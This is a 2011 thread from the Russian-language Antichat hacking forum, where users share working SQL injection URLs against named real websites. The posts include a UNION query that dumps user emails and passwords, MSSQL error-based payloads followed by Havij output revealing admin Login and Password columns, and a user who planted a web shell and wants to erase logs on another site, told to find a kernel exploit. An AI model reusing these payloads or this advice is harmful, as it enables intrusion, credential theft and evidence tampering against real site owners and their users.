ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

21.12.2011, 19:46
|
|
Новичок
Регистрация: 30.11.2008
Сообщений: 15
Провел на форуме: 115871
Репутация:
16
|
|
Сообщение от qaz
qaz said:
о, спасибо, а чё ето за чудо конструкция??
http://motoprotect.com.ua/index.php?id=-12'+union+select+1,2,(select(@x)from(select(@x:=0x 00),(select(0)from(user)where(0x00)in(@x:=concat(@ x,0x3c62723e,email,0x3a,password))))x),4+--+
где я могу почитать о том что ето (@x:=0x 00) и тп, означает?
http://mysql.ru/docs/man/Variables.html
|
|
|

21.12.2011, 19:58
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме: 42585
Репутация:
0
|
|
вопрос технического характера, как отследить HTTPS запрос?
|
|
|

21.12.2011, 20:47
|
|
Новичок
Регистрация: 17.04.2010
Сообщений: 0
Провел на форуме: 194
Репутация:
0
|
|
Подскажите, здесь есть уязвимость, или только раскрытие путей:
saturn.net/contacts.php?id=4%27
уж больно пути странные пишет...
|
|
|

21.12.2011, 22:11
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме: 390073
Репутация:
44
|
|
Подскажите... есть сайт, есть форма. Фильтр на иньекцию -
Код:
Code:
function is_secure($string)
{
//todo : better one (maybe, have to check) ver 1 : seems 2 be fine (only a-z 0-9)
$pattern = "#[^A-Za-z0-9]#";
if(@preg_match($pattern,$string)==true) return false;
else
return true;
}
Если делаем так :
preg_match обламывается на том, что ему передаётся массив, а не стринг. Можно ли что-нибудь кроме раскрытия путей замутить ?
|
|
|

21.12.2011, 22:21
|
|
Guest
Сообщений: n/a
Провел на форуме: 262707
Репутация:
935
|
|
Сообщение от DeepBlue7
DeepBlue7 said:
Подскажите... есть сайт, есть форма. Фильтр на иньекцию -
Код:
Code:
function is_secure($string)
{
//todo : better one (maybe, have to check) ver 1 : seems 2 be fine (only a-z 0-9)
$pattern = "#[^A-Za-z0-9]#";
if(@preg_match($pattern,$string)==true) return false;
else
return true;
}
Если делаем так :
preg_match обламывается на том, что ему передаётся массив, а не стринг. Можно ли что-нибудь кроме раскрытия путей замутить ?
нельзя
|
|
|
|

21.12.2011, 23:01
|
|
Guest
Сообщений: n/a
Провел на форуме: 107835
Репутация:
23
|
|
Сообщение от DarkMaster
DarkMaster said:
Подскажите, здесь есть уязвимость, или только раскрытие путей:
saturn.net/contacts.php?id=4%27
уж больно пути странные пишет...
Только раскрытие путей.
Но имеются другие уязвимые параметры и они говорят, что стоит база MSSQL , например:
http://saturn.net/news.php?id=430+order+by+datalength(@@version)+--+
http://saturn.net/news.php?id=convert(int,db_name()+COLLATE+SQL_Lati n1_General_Cp1254_CS_AS)+and+1=1
а, дальше вбиваешь этот url в havij и раскручиваешь да таблицы с паролем от админки
Count(name) of syscolumns Where id=(SELECT id FROM sysobjects WHERE name=char(119)%2bchar(95)%2bchar(83)%2bchar(105)%2 bchar(116)%2bchar(101)%2bchar(85)%2bchar(115)%2bch ar(101)%2bchar(114)) is 6
Column found: FullName
Column found: id
Column found: isEnabled
Column found: isSuperUser
Column found: Login
Column found: Password
|
|
|
|

22.12.2011, 11:24
|
|
Guest
Сообщений: n/a
Провел на форуме: 183267
Репутация:
84
|
|
http://www.kupibt.ru/catalogue/ID_19467
А эту как?
|
|
|
|

22.12.2011, 14:29
|
|
Guest
Сообщений: n/a
Провел на форуме: 107835
Репутация:
23
|
|
Сообщение от shadowrun
shadowrun said:
http://www.kupibt.ru/catalogue/ID_19467
А эту как?
А где ты тут скулю видишь?
|
|
|
|

22.12.2011, 15:19
|
|
Guest
Сообщений: n/a
Провел на форуме: 42706
Репутация:
6
|
|
Имею 2 сайта на 1м IP адресе,обычный сайт и форум IPB,в форум IPВ я залил шелл,мне нужно попасть на 1й сайт,чтобы почистить там 1 лог файл..есть варианты как переместиться на 1й сайт?..шелл определяет пути и т.п к 1му сайту но туда пройти не может.
|
|
|
|

22.12.2011, 15:22
|
|
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
Провел на форуме: 7879791
Репутация:
265
|
|
Сообщение от alerondel
alerondel said:
Имею 2 сайта на 1м IP адресе,обычный сайт и форум IPB,в форум IPВ я залил шелл,мне нужно попасть на 1й сайт,чтобы почистить там 1 лог файл..есть варианты как переместиться на 1й сайт?..шелл определяет пути и т.п к 1му сайту но туда пройти не может.
Смотри версию ядра и ищи сплоит
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|